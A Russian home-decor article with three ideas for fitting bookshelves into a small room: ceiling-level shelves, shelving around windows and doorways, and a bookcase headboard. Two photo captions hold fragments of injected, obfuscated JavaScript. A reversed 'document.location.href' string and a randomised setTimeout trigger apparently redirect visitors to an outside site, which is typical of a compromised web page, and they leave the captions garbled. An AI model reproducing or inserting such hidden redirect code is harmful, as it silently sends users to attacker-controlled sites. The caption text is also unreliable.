Добавить в закладки

3 роскошных идеи книжных шкафов для небольшой комнаты

В наше время все большую популярность электронные книги. Это и понятно, ведь они дешевле и занимают мало места (все книги можно поместить в один гаджет). Но бумажное издание — особенно, оно дает и тактильное ощущение, и запах типографии, и матовая поверхность, которую не даст ни одна «читалка». Чтобы поместить свою книжную библиотеку даже в небольшой комнате, можно прибегнуть к некоторым хитростям. Например, в необычном месте или сделать его узким. Также поможет распределение книг по разным комнатам: кулинарным место на кухне, детским – в детской, и тд. Мы подобрали несколько идей для книжных шкафов.

Верхняя часть комнаты

Книжный шкаф может быть как вертикальным, так и горизонтальным. Кто-то скажет, что горизонтальный шкаф – это просто полки, но главное, что их компактно можно разместить под потолком по периметру комнаты. Там могут расположится не только книги, но и фотографии, а также сувенирные изделия.

Полочки расположены по периметру комнаты под потолком, не мешают ходить и не «съедают» полезное пространство.

Полочки расположены по периметру комнаты под потолком, не мешают ходить и не «съедают» полезное пространство. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolkom-po-perimetru-komnatyi-294×400.jpg»>sledcomspb.ru

Вокруг окон и дверных проемов

Оборудовать пространство вокруг окна под книжный шкаф – отличная идея. Так можно увеличить площадь подоконника и превратить его практически в уютный диван для чтения. Окно даст много естественного света. А в комнатах, где нет необходимости ставить дверь, можно заменить дверной косяк и часть стены на полки для книг и разных полезных вещей. Что позволит сэкономить пространство.

Полки, обрамляющие проходы между комнатами, экономят пространство, т.к. на них можно поместить книги и элементы декора.

Полки, обрамляющие проходы между комнатами, экономят пространство, т.к. на них можно поместить книги и элементы декора. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolkom-dlya-knig.jpg»>sledcomspb.ru

Шкаф из спинки кровати в спальне

Самый лучший вариант для любителей почитать перед сном. На таком изголовье может поместиться целая библиотека. При этом можете сделать такую кровать изюминкой своего дома.

Из спинки кровати может получится замечательный и компактный шкафчик для книг.

Из спинки кровати может получится замечательный и компактный шкафчик для книг. Фото: stroy-podskazka.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 07.11.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: